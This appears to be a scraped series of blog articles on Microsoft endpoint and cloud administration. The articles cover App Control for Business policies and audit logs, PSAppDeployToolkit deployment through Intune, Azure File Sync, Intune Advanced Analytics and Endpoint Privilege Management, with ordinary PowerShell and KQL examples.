{D6D6C2D6-E8B6-4D8F-8223-14BE1DE562FF}	Enable app control policy to trust Windows components and Store apps and Trust apps with good reputation.
{63D1178A-816A-4AB6-8ECD-127F2DF0CE47}	Enable app control policy to trust Windows components and Store apps and Trust apps from managed installers.
{2DA0F72D-1688-4097-847D-C42C39E631BC}	Enable app control policy to trust Windows components and Store apps and Trust apps with good reputation and Trust apps from managed installers.

🪄 WDAC Wizard

(App Control for Business Wizard)

App Control for Business Wizard is an open-source tool from Microsoft that helps IT administrators quickly set up App Control for Business policies. The wizard provides a user-friendly interface for creating, editing and merging App Control policies.

Download and install it from the Microsoft website.

Base Policy

When you start the app, we first need to create a new policy with Policy Creator.

Then we select the type of policy we want to create, in this case a Base Policy with Multiple Policy Format.

INFO

Multiple Policy Format means that the policy can be used as a base policy and expanded with supplemental policies.

Next we select a configuration templates, in this example the Signed and Reputable Mode. Generally you can think of the policies as being from most restrictive on the left, to least restrictive on the right. That does not mean that the Signed and Reputable Mode is not restrictive or an open policy.

INFO

These templates essentially reflect the built-in controls Intune has offered, but with one key difference: Intune includes the Managed Installer as a main option and has overall more unchangeable settings, whereas in the older WDAC Wizard the Managed Installer was optional in all templates.

Base Policy Template explanation

New Azure FileShare | Azure

Fri, 12 Sep 2025 00:05:33 GMT

New Azure File Share Resource (Microsoft.FileShares)

👋 Introduction

Microsoft has released a new way to create and manage Azure file shares using the Microsoft.FileShares resource provider. Instead of handling everything through storage accounts, this update lets you manage file shares directly. You can now set security and network controls for each share, monitor them individually, and scale as needed without extra complexity.

This new model is currently in preview and supports only NFS file shares on premium SSD storage. Premium SSDs provide high performance but they are not cheap, so keep an eye on that if you decide to test this Resource.

This preview is a great step toward simpler, more flexible file shares in the cloud.

WARNING

Microsoft.FileShares is currently in preview and features are limited, but will get expanded in the future.

Open the Azure admin portal.
Click Create a resource, search for File Share (Microsoft.FileShares), choose the File Share resource from the results and then click Create.

Fill in the required fields in the Basics tab.

INFO

At this time, Redundancy options are limited to ZRS (Zone Redundant Storage) and LRS (Locally Redundant Storage).
The File share name is not the name shown when you mount the drive. This is just the resource name in Azure. So any naming conventions you have for resources in Azure can be applied without affecting end-user experience.

Select your Advanced and Networking options.
- Here you can set the actual mount name the end-user will see.

Protocol explanation

PSAppDeployToolkit 4 | Intune

Tue, 26 Aug 2025 21:31:44 GMT

PS App Deploy Toolkit 4.1

👋 Introduction

The PSAppDeployToolkit is a community tool that provides a framework for deploying applications in a Windows environment. It simplifies the process of creating complex app deployments and harmonises the installation and deferral process.

Patch My PC has recently started to support the project, but remains open source. You can find more information about this partnership here.

Features:

Name	Description
Modular Design	The toolkit is built with a modular approach, allowing users to include only the components they need for their specific deployment scenarios.
Admin-Friendly	The toolkit provides a set of pre-defined functions and templates that streamline the deployment process, reducing the need for extensive scripting.
Logging and Reporting	The toolkit includes built-in logging and reporting features, making it easy to track deployment progress and troubleshoot issues.
Integration with Intune	Since the latest version, the toolkit popups work seamless with Microsoft Intune, even when deployed as SYSTEM.
Smart Deployment Control	Validate prerequisites, close in-use apps, prompt users for deferrals, and handle reboots gracefully.
Silent & Reliable Installs	Run installers silently with detailed logging, handle exit codes automatically, and uninstall old/conflicting versions.
Rich PowerShell Toolkit	Pre-built functions for file/registry management, shortcuts, DLL registration, policy refresh, and more.
MCM/3rd-Party Integration	Full support for Microsoft Configuration Manager, exit code handling, bundling apps, and efficient distribution.
User-Friendly Experience	Customizable UI prompts to close apps, save work, and manage installation timing with countdowns or deferrals.

⚙️ Configuration

To get started with the PSAppDeployToolkit, you can either install the PowerShell Module or download the deployment Template from the official GitHub Page here.

powershell

Install-Module -Name PSAppDeployToolkit -Scope CurrentUser

INFO

The only difference between the two methods is that installing the PowerShell Module allows you to create a new template with a simple command and having the functions readily available, instead of downloading the ZIP file and extracting it manually.

Psadt config

Now that you got the PSAppDeployToolkit template, you can start configuring it for your specific deployment needs.

INFO

All the files you’ll work with are well-commented, making it easy to understand their purpose and functionality even without extensive PowerShell knowledge.

The folder structure of the PSAppDeployToolkit template is as follows:

PSAppDeployToolkit
│
├── Assets
│   └── Icons
│
├── Config
│   └── In depth configurations (i.e. UI, Assets, Paths ...)
│
├── Files
│   └── Setup file folder
│
├── PSAppDeployToolkit
│   └── Main toolkit assets and functions (Do not touch! ⛔)
│
├── PSAppDeployToolkit.Extension
│   └── Extension functions
│
└── Strings
│   └── Customizable texts used in the toolkit
│
└── SupportFiles
│   └── Additional files needed for your deployment
│
└── Invoke-AppDeployToolkit.exe
└── Invoke-AppDeployToolkit.ps1

INFO

The following example shows a bare-minimum configuration for deploying an EXE file. For a simplified setup, you can use an MSI installer, place it in the Files folder, no additional configuration required. (Zero Configuration Deployment).

Files

The Files folder is where you place the setup files needed for your deployment.
So first you need to download the setup files for your deployment and place them here.

Invoke-AppDeployToolkit.ps1

The primary configuration is handled in the Invoke-AppDeployToolkit.ps1 file, while the Invoke-AppDeployToolkit.exe file simply provides a more convenient way to run it.

The file is sectioned into several areas, that are all well documented.

Important for the configurations are the following areas:

Variables
Install
Uninstall
Repair

Whereby the latter three areas are further sectioned into Pre-, Main and Post- stages.

First you enter the nessecary app variables.

TIP

Keep in mind that the AppVendor, AppName and AppVersion are displayed in the header of the enduser installation window.

Next, configure the installation process by adding PowerShell commands to the Pre-Install, Install and Post-Install sections.

TIP

The toolkit provides many built-in functions to handle common deployment tasks. See the Functions Reference for details.

In this example we use the main installation function Start-ADTProcess in the Install section, in which we define the installer filepath and argumentlist. This functions also automatically starts any other needed function for the installation process like Show-ADTInstallationWelcome.

Now, we change the standard success message in the Post-Install section, to something apropriate for our application.

Finally, we configure the Uninstall section to enable uninstalling the application.

Config

In the config section you could configure Asset Paths, MSI Installation Parameters and other settings in the config.psd1 file.

For our example we do not need to change anything here. To change the AppIcon we later just replace the image file.

Strings

To customize user-facing texts (except, for example, the installation success message), open the strings.psd1 file in the Strings folder (which contains the default English strings), or select the subfolder for your preferred language.

The available strings categories for customization are:

BalloonTip
BlockExecutionText
DiskSpaceText
InstallationPrompt
ProgressPrompt
RestartPrompt
CloseAppsPrompt

For our example we do not need to change anything here.

Assets

The Assets folder contains images and icons used in the user interface of the toolkit. For our example we replace the AppIcon.png standard file with the appropriate icon for our application.

SupportFiles

In the SupportFiles folder you can put additional files that you may require during the installation process, such as configuration files or scripts.

For our example we do not need to change anything here.

Create Intune App

Prepare the Intune app package

Download the Microsoft Win32 Content Prep Tool on the official GitHub website.
Start the tool and follow the prompts to package your application (see screenshot).

Create the Intune app

Open the Microsoft Intune admin center and navigate to Apps → Windows and click Create.
Select the app type Windows app (Win32).
In the App package file section, upload the intunewin file you created earlier.
Fill in the required information in the App information section.
In the Program section, specify the install and uninstall commands.
- Install command: Invoke-AppDeployToolkit.exe -DeploymentType Install
- Uninstall command: Invoke-AppDeployToolkit.exe -DeploymentType Uninstall
Configure the app's requirements and detection rules.

Configure Dependencies, Supersedence and Assignments.
Review and create the app.

INFO

You can learn more about Installation parameters here.

⭐ User experience

As the user in our example the installation process is straightforward and user-friendly. As soon as Intune pushed the app, the user received a notification where he can select to install the app or defer the installation.

This is the new feature in the last release of the PS App Deploy Toolkit. You do not need any additional tools anymore to display these messages for the user, even so the Installation is run as SYSTEM.

The user then sees a non interactive installation window and as soon as the installation is complete, the user will see the message we configured earlier and the app is installed.

📦 Deployment Editor

If you want a more visual approach to creating and managing your deployment packages, you can use the excellent Deployment Editor by 'tugi.ch'. You can download it from the Github Page.

When you start the Deployment Editor, you can plug the functions you want to use directly from the left pane and configure it in the middle and right side.

You can also directly open the project folders from the top menu, to copy your Installer there.

Once configured, clicking the "Generate Deployment" button in the center top toolbar will create a complete deployment package with the same folder structure as the official template, but with your customized configuration already applied.

INFO

If you want an in depth Guide to this tool you can find more information on the Github Page and the official Guide Video on YouTube.

💡 Conclusion

PSAppDeployToolkit can make deploying complicated apps on Windows a whole lot easier, especially when you need apps closed before starting or want to give your users the possibility to defer installations. Now with its smooth Intune integration and handy features it got even better. Whether you prefer scripting or a visual editor, you’ll find it straightforward to set up, customize, and manage your deployments.

So in the end it is a great tool in the arsenal of the Intune administrator and well worth a look.

Resources

Azure File Sync with Azure Arc Extension | Azure

Tue, 12 Aug 2025 14:09:11 GMT

👋 Introduction

Managing files across multiple locations while balancing on-premises infrastructure and cloud capabilities can present significant challenges. Azure File Sync offers a streamlined solution by enabling you to centralize file services in Azure while maintaining the performance and compatibility of on-premises servers.

In this article, I will explore how to configure Azure File Sync and install and configure the Azure File Sync agent using the new extension.

🧑‍🔧 Configuration

1. Create Storage account

First open the Azure admin Portal → go to Storage accounts and create a new Storage Account with Create.
Now you can enter the Storage Account details you want and click Review + create in the end.

Open your created Storage account go to Data Storage → File Shares → and select + File Share.
Now you enter the Name, Access tier and Backup information (if needed) and then select Review + create.

3. Create Azure Sync Service

Now you open the Azure admin portal → Storage Sync Service and click Create.
Next, you need to select your subscription, choose the resource group and provide a name for the Sync Service.

The Sync service needs to be in the same region as your Storage Account.

Now, open the Storage Sync Service you created → Sync and select Sync groups.
Select Create a sync group, enter a name, subscription and select the storage account, Azure File Share and then click Create.

4. Install Server Extension with Azure Arc

Go to your Azure admin center → Azure Arc and select your Arc-enabled Windows Server from the list.
Go to Extensions and click + Add.
Now select Azure File Sync Agent for Windows.

Next you can configure the agents settings, then click Review + create and wait for the Deployment to complete.

5. Configure Azure File Sync Agent

Connect to your server and make sure that the Azure PowerShell module ist installed, because it is needed by the agent to work. If missing, you can install it with the following command:

powershell

install-module az -force

IMPORTANT

For the Agent to work properly, you must disable IE Enhanced Security Configuration in the Server Manager.

After the agent got successfully deployed on the server, you can find the Azure Storage Sync Agent Updater in the list of installed programs.

Start the Updater and it will check the agent version, then start the Server Registration where you need to Sign in to Azure.
Select your Azure Subscription, Resource Group and Storage Sync Service, then click Register.

Alternatively you can use PowerShell for the registration:

powershell

Register-AzStorageSyncServer -ResourceGroupName "<your-resource-group-name>" -StorageSyncServiceName "<your-storage-sync-service-name>"

Next we need to configure the sync in the Azure Portal.
For that you go back to the Azure admin portal and open the Storage Sync Service you created.
Here you select Sync → Sync groups and open your previously created sync group.
In the Sync group you need to click Add server endpoint and select your server and enter the Path you want to sync.

Additionally you configure the Cloud Tiering and Initial Sync options.

Cloud tiering

Advanced Analytics | Intune Suite | Intune

Thu, 12 Jun 2025 22:33:57 GMT

Advanced Analytics

👋 Introduction

Advanced Analytics enhances Intune’s standard reporting by providing deeper insights, near real-time data, and more robust monitoring capabilities. It gives you a clear view of how your users are experiencing their devices and helps you improve with smart, data-driven insights. You can spot and fix endpoint issues before they become big problems, troubleshoot faster, and make sure your users have a smooth tech experience.

Here’s what you get with the Advanced Analytics features:

Custom device scopes: Filter Endpoint analytics reports using Scope tags to focus on specific devices, groups, or locations. Get targeted scores and insights for just those devices.
Anomalies: Keep an eye on device health and catch any dips in user experience or productivity after making changes. This helps you react quickly if something goes wrong.
Enhanced device timeline: Get more events and fresher data to help you troubleshoot device issues faster.
Device query: Check up on the state and configuration of devices almost in real time, so you’re always in the loop.
Battery health report: See how hardware performance like battery issues might be affecting your users.

📝 The Basics of Intune analytics

Scores

Endpoint analytics scores go from 0 to 100, giving you a quick way to see how your environment stacks up. These scores show how each metric affects your setup and let you compare your results to the average across all organizations so you can see where you’re ahead or where there’s room to improve. You typically receive analytics scores broken down by device, device model, and other relevant groupings. This granularity helps you identify trends, pinpoint issues, and compare performance across different segments of your environment.

Baselines

Baseline scores are the averages against which your organisation is measured, as discussed in the Scores section above, and are shown on charts as triangle markers. Think of these as built-in median scores from all organizations, handy for seeing how you stack up. You can also set up your own baselines using your current numbers, making it easy to track progress or spot any backslides over time.

Insights and recommendations

Insights and recommendations give you a handy to-do list for boosting your score. You’ll see a list right on the reports overview page and as you dig into different report sections, the suggestions update to match what you’re looking at.

Clicking the insight link under Insights and recommendations gives you detailed information about the devices and attributes associated with that insight.
The Learn more link explains how the metric is scored and outlines recommended actions to address the insight.

INFO

You can find more information about known issues of these basics here.

✅ Prerequisites for Intune analytics

Device

Windows 10 version 1903 or later
Microsoft Entra joined or Microsoft Entra hybrid joined
Intune-managed or co-managed devices
The 'Connected User Experiences' and 'Telemetry' services on the device is running
The endpoints need to reach: https://*.events.data.microsoft.com
Set an Intune data collection policy in your configuration profiles under the Windows health monitoring template
Give your consent to the Intune data collection policy in the Endpoint analytics settings

Licenses

Intune license
Intune suite license or Endpoint analytics standalone license

Enabling Advanced Analytics

When license requirements are met, then Advanced Analytics features are automatically enabled in your tenant.

Mixed licensing scenarios

Endpoint Privilege Management | Intune Suite | Intune

Thu, 12 Jun 2025 22:33:57 GMT

Endpoint Privilege Management

👋 Introduction

Endpoint Privilege Management (EPM) is a powerful feature in the Intune Suite that helps organizations strike the right balance between security and productivity by allowing users to elevate their privileges only when necessary. With EPM, you can grant standard users temporary admin rights for approved applications or tasks without making them full-time administrators. This approach supports Zero Trust principles and helps reduce the risks associated with excessive permissions.

You can find and configure Endpoint Privilege Management in the Microsoft Intune admin center by navigating to Endpoint Security → Endpoint Privilege Management. Here, you'll be able to set up policies, manage elevation rules, review elevation requests, and access detailed reports to monitor usage and compliance.

In this article, I'll walk through the key features, configuration steps, and user experiences to help you get started with EPM and make the most of its capabilities.

Reports

Intune provides you with a few standard reports to help keep track of your elevations.

Elevation report: See all elevations, both managed and unmanaged by elevation policies.
Managed elevation report: See the status of elevations that occurred inside the elevation management policies
Elevation report by applications: See all elevations, both managed and unmanaged by application.
Elevation report by Publisher: See number of elevations by each Publisher
Elevation report by User: See number of elevations by each User

If you require more detailed analysis and additional data, the Advanced hunting page in the Microsoft Defender Portal should come in handy. The following KQL queries can help you find more information about the elevations in your environment.

Finds process elevations:

KQL

DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessIntegrityLevel != ProcessIntegrityLevel
    and ProcessIntegrityLevel == "High"
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, InitiatingProcessCommandLine,
          FileName, ProcessCommandLine, ProcessId, InitiatingProcessId, ReportId, FolderPath,
          InitiatingProcessIntegrityLevel, ProcessIntegrityLevel
| order by Timestamp desc

Finds app elevations from the Endpoint Privilege Management:

KQL

DeviceEvents
| where ActionType == "AppElevationRequest"
   or ActionType == "AppElevationApproved"
   or ActionType == "AppElevationDenied"
| project Timestamp, DeviceName, AccountName, FileName, FolderPath, ActionType, ReportId, InitiatingProcessCommandLine
| order by Timestamp desc

Policies

In the Policies tab you can create the Elevation rules policies and Elevation settings policies. You can find more information about that in the following article.

Reusable settings

Reusable settings allow you to upload certification files once and reference them across multiple policies, simplifying management and reuse.

Click Add.
Enter 'Name' and 'Description'.
Upload your certification file.

Review and add the setting.

WARNING

Please be aware that this feature is still in Preview.

Elevation requests

In the Elevation requests tab, you can view and manage user requests for privilege elevation. This section allows IT administrators to review, approve, or deny elevation requests submitted by end users. You can find more information about that in the following article.

🧑‍🔧 Configuration

When Endpoint Privilege Management Settings get applied to a device, EPM will get activated. In pratical terms, that means, that EPM will be implemented into the Context Menu of the System. To accomplish this the EPM Microsoft Agent gets installed in the backround. This agent includes the EpmTools PowerShell module, which you can use to troubleshoot or get additional file atributes for future rules you want to build.

powershell

Import-Module 'C:\Program Files\Microsoft EPM Agent\EpmTools\EpmCmdlets.dll'

Following are the available cmdlets:

Name	Description
Get-Policies	Retrieves a list of all policies received by the Epm Agent for a given PolicyType (ElevationRules, ClientSettings).
Get-DeclaredConfiguration	Retrieves a list of WinDC documents that identify the policies targeted to the device.
Get-DeclaredConfigurationAnalysis	Retrieves a list of WinDC documents of type MSFTPolicies and checks if the policy is already present in Epm Agent (Processed column).
Get-ElevationRules	Query the EpmAgent lookup functionality and retrieves rules given lookup and target. Lookup is supported for FileName and CertificatePayload.
Get-ClientSettings	Process all existing client settings policies to display the effective client settings used by the EPM Agent.
Get-FileAttributes	Retrieves File Attributes for an .exe file and extracts its Publisher and CA certificates to a set location that can be used to populate Elevation Rule Properties for a particular application.

EPM Settings

Elevation settings let you decide how the elevation client should act by default on your endpoints.

When you create a policy you start with entering the Name and Description.
Next activate the Endpoint Privilege Management switch and and you're ready to dive into the rest of the settings.

	Default elevation response Deny all requests Require user confirmation Validation: Business justification Validation: Windows authentication Require support approval Not configured Send elevation data for reporting Reporting Scope: Diagnostics data and managed elevations only Reporting Scope: Diagnostics data and all endpoint elevations Reporting Scope: Diagnostics data only

With the 'Default elevation response' settings you got the possibility to implement a Whitlist or Blacklist approche to your elevation requests and of course you can change that up between groups. To stay with the least privilege principles, you could make your IT accounts standard users instead of administrators and allow them by default to elevate apps. That would mean that they can still do all the tasks that need elevation, but are still standard users outside of that. In Addition, all the elevations would be logged.

On the other side of that, you can deny all non IT users by default the elevation and only allow specific ones with business justification or support approval.

EPM Rules

Elevation Rules let you decide when and how users can get temporary admin access to specific apps or files on their devices just when they need it, and only for what you allow.

When you create a policy you start with entering the Name and Description.
Next you can add individual rules to the policy.

When you click Add, the Rule properties open.
Specify the Rule name, Description, Elevation conditions and File information for your elevation rule.

Elevation type:

User confirmed: The user must provide a business justification, complete Windows authentication, or both to proceed with elevation.
Automatic: Elevation requests are approved automatically without user or IT intervention.
Support approved: Elevation requests are sent to the Elevation requests tab, where IT can review and approve or deny them.

	Elevation type User confirmed Validation: Business justification Validation: Windows authentication Automatic Support approved Child process behavior Allow all child processes to run elevated Require rule to elevate Deny all Not configured

Now you enter the File information. For this you need at least a File name and a File hash or a certificate.

Signature source:

Use a certificate file in reusable settings: You can use a previously uploaded certificate from your Reusable settings.
Upload a certificate file: You can upload the certificate for the file you want to elevate.

	Signature source Use a certificate file in reusable settings Certificate type: Publisher Certificate type: Certificate authority Upload a certificate file Certificate type: Publisher Certificate type: Certificate authority Not configured Restrict Arguments Allow (Specifies the argument values of the argument based elevation rule.) Not configured

TIP

An easy way to get the file hash of an executable is to use the get-filehash CMDlet.

powershell

get-filehash notepad++.exe

And an easy way to get the `SignerCertificate`from an executable is to use the `Get-AuthenticodeSignature` CMDlet.

powershell

(Get-AuthenticodeSignature .\notepad++.exe).SignerCertificate | Export-Certificate -Type CERT -FilePath '.\notepad++.cer'

If you now save the rule, you can either add more rules to your policy or click Next, add the assignments and create the policy.

IMPORTANT

To support Endpoint Privilege Management, allow the following hostnames on tcp port 443 through your firewall.
For communication between clients and the cloud service:

*.dm.microsoft.com - The use of a wildcard supports the cloud-service endpoints that are used for enrollment, check-in, and reporting, and which can change as the service scales.
*.events.data.microsoft.com - Used by Intune-managed devices to send optional reporting data to the Intune data collection endpoint.

WARNING

SSL Inspection is not supported on endpoints required for Endpoint Privilege Management.

⌨️ Usage

Following you will find the User- and Admin-Experince for the User confirmed, Automatic and Support approved elevation types.

Like I explained in the Configuration section above (Link), with Endpoint Privilege Management the EPM Microsoft Agent gets installed on the endusers device. With that comes a new entry in the context menu.

User confirmed

For the User confirmed elevation type, you do a right click on your chosen file and select the newly created Run with elevated access point.

Next, based on your rule configuration, a Windows dialog will prompt you to provide a business justification, complete a Windows authentication or both.

Then the file will be started with elevated privileges.

INFO

If you don't have permission to elevate the file, you'll see the following error message.

Automatic

For the Automatic elevation type, you do a right click on your chosen file and select the Run with elevated access point.
The file will immediately open with elevated privileges, without requiring any additional user input or confirmation.

Support approved

User experience

For the Support approved elevation type, you do a right click on your chosen file and select the Run with elevated access point.
Next, a Windows dialog will prompt you to provide a business justification.
You'll see a confirmation that your request was sent. Just close the window, you don't need to do anything else until you get a response.

Admin experience

In the Intune admin portal, you can access the above mentioned Elevation requests tab by navigating to Endpoint Security → Endpoint Privilege Management. Here you can find the requested elevation requests.

When you select a request, a side panel opens displaying the request properties. This includes the requested file information, timestamp, compliance status, device name, username, and the submitted business justification.

When you choose to approve the request, a pop-up window appears prompting you to enter your own business justification.
Once approved, the user receives elevated access to the requested file for 24 hours.

TIP

You can create a reusable setting with one click for a requested file directly from the user request by selecting the Add to reusable settings button in the request properties.

Additionally, if a user requests elevation for a file that doesn't have an existing rule, you can quickly create a new rule using the file details from the request window by selecting the Create a rule with these file details button.

User experience

After the elevation request is approved or denied, the user will receive a Windows toast notification within a few minutes, informing them of the outcome.

If you now start the app using the Run with elevated access option in the context menu, it will immediately launch with elevated privileges.

WARNING

If you launch the app by double-clicking it as usual, it will run with standard permissions and not with elevated access.

💡 Conclusion

Endpoint Privilege Management is a really useful tool for organisations trying to implement Zero Trust principles and enforce least privilege access without affecting user productivity. EPM lets you control exactly who can elevate their privileges, and it provides detailed reports and flexible approval workflows. This helps to reduce security risks associated with excessive permissions. It's an investment, obviously, either as part of the Intune Suite or as a standalone purchase, but the security, compliance and operational efficiency it brings make it a really compelling choice for modern endpoint management.

Endpoint Privilege Management (EPM) is a key enabler for organizations pursuing Zero Trust and least privilege strategies.
Granular control over privilege elevation ensures users get admin rights only when truly needed.
Comprehensive reporting and audit trails support compliance and security monitoring.
Flexible approval workflows including user confirmation and support approval balance security with productivity.
Reusable settings and policy templates simplify ongoing management.
Integration with Intune streamlines deployment and policy enforcement across your environment.
Reduces risk by minimizing the attack surface associated with excessive permissions.
Empowers IT to respond quickly to elevation requests without granting blanket admin access.
Comes at a cost EPM is available as part of the Intune Suite or as a standalone purchase.

Monitor App Control for Business Audit Logs | Intune

Sat, 31 May 2025 21:35:05 GMT

Monitoring App Control for Business Audit Logs

👋 Introduction

In this article, we’ll dive into how to monitor and manage audit logs for App Control for Business policies in Microsoft Intune. App Control for Business is a handy tool that helps you lock down application security by deciding which apps can run on your managed Windows devices. By checking out audit logs, you can see how apps behave, spot any issues, and tweak your policies to fit your organization’s needs.

This guide walks you through everything from finding and exporting logs to creating and automating App Control policies using audit data. Whether you’re just getting started with App Control or looking to fine-tune your setup, this article has you covered with practical tips and resources.

❓ What is App Control for Business?

To help prevent undesired apps from running on your managed Windows devices, you can use Microsoft Intune App Control for Business policies. Intune's App Control for Business policies are part of endpoint security and use the Windows ApplicationControl CSP to manage allowed apps on Windows devices.

TIP

You can find a Step-by-Step guide on how to implement App Control for Business in my article here.

🔍 How to Montior the Logs?

You can find the App Control Events for binary logs in the Event Viewer under:

Applications and Services Logs\Microsoft\Windows\CodeIntegrity\Operational

and you can find the App Control Events for Script and MSI logs in the Event Viewer under:

Applications and Services Logs\Microsoft\Windows\AppLocker\MSI and Script

You can find a list of the relevant event IDs below.

Alternatively you can get the events trough a Advanced Hunting query:

kql

DeviceEvents
| where ActionType startswith "AppControlExecutableAudited"
| where Timestamp > ago(30d)
|project DeviceId,                               // the device ID where the audit block happened
FileName,                                        // The audit blocked app's filename
FolderPath,                                      // The audit blocked app's system path without the FileName
InitiatingProcessFileName,                       // The file name of the parent process loading the executable
InitiatingProcessVersionInfoCompanyName,         // The company name of the parent process loading the executable
InitiatingProcessVersionInfoOriginalFileName,    // The original file name of the parent process loading the executable
InitiatingProcessVersionInfoProductName,         // The product name of the parent process loading the executable
InitiatingProcessSHA256,                         // The SHA256 flat hash of the parent process loading the executable
Timestamp,                                       // The event creation timestamp
ReportId,                                        // The report ID - randomly generated by MDE AH
InitiatingProcessVersionInfoProductVersion,      // The product version of the parent process loading the executable
InitiatingProcessVersionInfoFileDescription,     // The file description of the parent process loading the executable
AdditionalFields                                 // Additional fields contains FQBN for signed binaries, the CN of the leaf certificate, product name, original filename and version of the audited binary.

kql

DeviceEvents
| where ActionType startswith "AppControlCodeIntegrity"
   or ActionType startswith "AppControlCIScriptBlocked"
   or ActionType startswith "AppControlCIScriptAudited"

Export with PowerShell

If you want to export the events using PowerShell, you can use a command like this:

powershell

# This command filters the event logs for specific criteria.
Get-WinEvent -FilterHashtable @{ LogName='*'; Id='3076'; ProviderName='Microsoft-Windows-CodeIntegrity' }

Export with Intune

If you want to collect the events from your end users' computers, I have created a script that simplifies the process. This script can be deployed via Intune and automatically gathers all relevant events from the past 30 days. The collected logs are saved in the Intune Management Extensions log folder as XML.

You can run the script on your clients' computers by deploying it through Intune or executing it manually in an elevated PowerShell session.
For Intune deployment, follow these steps:

Navigate to the Microsoft Intune admin center -> Devices -> Scripts and remediations -> Platform scripts.
Click Add and select Windows 10 and later.
Provide a Name and Description for the script.
Upload the script file and configure the required settings.

Assign the script to the desired groups and click Add to complete the deployment.

For manual execution, download the script from the GitHub repository and run it in an elevated PowerShell session on the target computer.

📝 Create an App Control for Business policy from these logs

IMPORTANT

It is recommended to use a standard base policy, such as the default Microsoft policy, to block most scenarios.
Then, create a supplemental policy to define specific exclusions or blocks tailored to your requirements.

Files allowed by either the base policy or the supplemental policy will run.

If you plan to use two base policies, keep in mind that only applications allowed by both policies run without generating block events.

Use the New-CIPolicy cmdlet to create a new App Control policy from your audit logs. In this example, we’re using the FilePublisher rule level with fallback options like SignedVersion, FilePublisher and Hash.

powershell

New-CIPolicy -FilePath "C:\temp\Policy.xml" -Audit -Level FilePublisher -Fallback SignedVersion,FilePublisher,Hash -UserPEs -MultiplePolicyFormat

NOTE

When creating policies from audit events, think carefully about the file rule level you choose to trust.
For more information about App Control rule levels, see Understand App Control policy rules and file rules | Microsoft Learn.

Automating creating App Control policies from logs Automating creating App Control policies from logs"">

First, set up an audit App Control policy to start collecting events in your clients' event viewer.
Need help? Check out this guide: App Control for Business | michaelsendpoint.com.

Next, set up a KeyUser group in your environment. This group should include users who use all the apps, scripts, and resources your organization needs.
By focusing on this group, you can keep things simple and avoid creating too many unnecessary exclusions across all managed devices, which could happen if you included everyone.

Finally, use Intune to push out a script that runs for your key user group.

You can use the following script or download it directly from my GitHub repository to push to your key users.
Be aware that the script needs an elevated powershell session.

IMPORTANT

Make sure to give the audit policy enough time to gather events before running this script.
If an app, script, or resource hasn’t been used, it won’t show up in the event logs, and no exclusion will be added to the policy.
Waiting around 30 to 60 days usually works well.

powershell

# Creating the audit policy in the Microsoft Intune Management Extension log folder.
# When running this command manually, it will print warnings for event logs that describe files that are no longer present on the system.
# There will be no exceptions added for files that are no longer on the system. 
New-CIPolicy -FilePath "$($env:ProgramData)\Microsoft\IntuneManagementExtension\Logs\$($env:computername)_policy.xml" -Audit -Level FilePublisher -Fallback SignedVersion,FilePublisher,Hash -UserPEs -MultiplePolicyFormat

# Convert the newly created base policy into a supplemental policy to use it alongside the default Microsoft base policy.
Set-CIPolicyIdInfo -FilePath "$($env:ProgramData)\Microsoft\IntuneManagementExtension\Logs\$($env:computername)_policy.xml" -SupplementsBasePolicyID "{2DA0F72D-1688-4097-847D-C42C39E631BC}"

INFO

Here are the IDs for the default Microsoft base policies.
You can activate these using Intune or group policy.

Base policy ID	Explanation
{A8012CFC-D8AE-493C-B2EA-510F035F1250}	Enable app control policy to trust Windows components and Store apps.
{D6D6C2D6-E8B6-4D8F-8223-14BE1DE562FF}	Enable app control policy to trust Windows components and Store apps and Trust apps with good reputation.
{63D1178A-816A-4AB6-8ECD-127F2DF0CE47}	Enable app control policy to trust Windows components and Store apps and Trust apps from managed installers.
{2DA0F72D-1688-4097-847D-C42C39E631BC}	Enable app control policy to trust Windows components and Store apps and Trust apps with good reputation and Trust apps from managed installers.

Go to your key users' devices in Intune and click Collect diagnostics.

This will let you download a zip file from Intune containing the Intune Management Extension log folder ((67) FoldersFiles ProgramData_Microsoft_IntuneManagementExtension_Logs) along with the created policies.

If you're interested in learning more on how to manage multiple App Control policies, check out the following resources:

🔢 App Control for Business Event IDs

AppLocker - MSI and Script Event IDs AppLocker - MSI and Script Event IDs"">

App Control block events for packaged apps, MSI installers, scripts, and COM objects

Event ID	Explanation
8028	Script host queried App Control about a file. The file ran in audit mode but would fail in enforced mode.
8029	Enforcement mode equivalent of 8028. Script may run with restrictions instead of being blocked.
8036	COM object was blocked. See Allow COM object registration.
8037	Script host allowed a script to run as it passed the App Control policy.
8038	Signing info for scripts, correlated with 8028/8029. Unsigned scripts generate TotalSignatureCount 0.
8039	Packaged app allowed to run in audit mode but would be blocked in enforced mode.
8040	Packaged app was blocked due to App Control policy.

CodeIntegrity - Operational Event IDs CodeIntegrity - Operational Event IDs"">

App Control block events for executables, dlls, and drivers

Event ID	Explanation
3004	Kernel driver with invalid signature tried to load.
3033	File's signature is revoked or expired. Occurs with 3077.
3034	Audit mode equivalent of 3033.
3076	File would have been blocked in enforced mode.
3077	File was blocked as it didn't pass the policy.
3089	Signature info for files that were audit blocked.

App Control policy activation events

Event ID	Explanation
3095	Policy can't refresh; reboot required.
3096	Policy is up-to-date; no refresh needed.
3097	Policy refresh failed.
3099	Policy loaded successfully.
3100	Policy refresh failed; retry required.
3101	Policy refresh started.
3102	Policy refresh completed.
3103	Policy refresh ignored.
3105	System attempting to refresh the policy.

Diagnostic events for Intelligent Security Graph (ISG) and Managed Installer (MI)

NOTE

When Managed Installer is enabled, customers using Log Analytics should note that it may generate a significant number of 3091 events. To manage Log Analytics costs effectively, consider filtering out these events.

The following events are super helpful for troubleshooting when your App Control policy uses Intelligent Security Graph (ISG) or Managed Installer (MI). They give you insights into why a file was allowed or blocked based on ISG or MI. Events 3090, 3091, and 3092 aren’t necessarily red flags but should be looked at alongside other events like 3076 or 3077 to get the full picture.

Depending on your Windows version, you’ll find these events in the CodeIntegrity - Operational or CodeIntegrity - Verbose event logs.

Event ID	Explanation
3090	Optional This event indicates that a file was allowed to run based purely on ISG or managed installer
3091	This event indicates that a file didn't have ISG or managed installer authorization and the App Control policy is in audit mode
3092	This event is the enforcement mode equivalent of 3091
8002	This event is found in the AppLocker - EXE and DLL event log. When a process launches that matches a managed installer rule, this event is raised with PolicyName = MANAGEDINSTALLER found in the event Details. Events with PolicyName = EXE or DLL aren't related to App Control

Events 3090, 3091, and 3092 are reported per active policy on the system, so you may see multiple events for the same file.

ISG and MI diagnostic event details

The following information is found in the details for 3090, 3091, and 3092 events.

Name	Explanation
ManagedInstallerEnabled	Indicates whether the specified policy enables managed installer trust
